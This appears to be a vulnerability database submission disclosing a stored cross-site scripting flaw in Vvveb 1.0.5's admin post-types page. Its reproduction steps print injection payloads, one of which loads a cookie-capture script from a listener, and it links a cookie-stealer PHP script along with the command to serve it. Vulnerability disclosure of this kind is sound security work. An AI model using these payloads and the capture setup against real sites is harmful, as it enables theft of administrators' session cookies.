| Title | Vvveb 1.0.5 Cross Site Scripting |
|---|
| Description | Description
The endpoint at [/vadmin123/index.php?module=settings/post-types] is vulnerable to XSS. When a payload is applied here, it makes the whole site and every endpoint access through [/vadmin123/] vulnerable to attack.
This vulnerability can be exploited as long as you either a “Site Administraor”, “Administrator” or “Super Administrator”.
A well crafted XSS payload can be used to harvest cookies from multiple site admins, editors, vendors and everyone else.
Reproduce
Login as a moderator with “Site Administrator” role, open the following endpoint:
/vadmin123/index.php?module=settings/post-types
On top left, click on “Add type” button. From here you can add a post type, in [name="post_type[type]"] field you can enter a payload like the following:
"><img src='http://127.0.0.1:1718/capture.php'>
This payload will execute anytime anyone logs in through the admin panel [/vadmin123/], it executes malicious JavaScript used for stealing cookies silently.
To setup a cookie stealer server, you can save the following PHP script as capture.php:
https://gist.github.com/0xHamy/b2674eeffd1f73af96d29f152c47bcbd
Start a PHP server to serve it:
$ php -S x.x.x.x:1718
Can also be exploited with:
<img/src=x onerror=alert(2025)> |
|---|
| Source | ⚠️ https://hkohi.ca/vulnerability/11 |
|---|
| User | 0xHamy (UID 88518) |
|---|
| Submission | 07/29/2025 20:47 (9 months ago) |
|---|
| Moderation | 08/04/2025 08:27 (5 days later) |
|---|
| Status | Accepted |
|---|
| VulDB entry | 318647 [givanz Vvveb up to 1.0.5 Add Type post-types cross site scripting] |
|---|
| Points | 20 |
|---|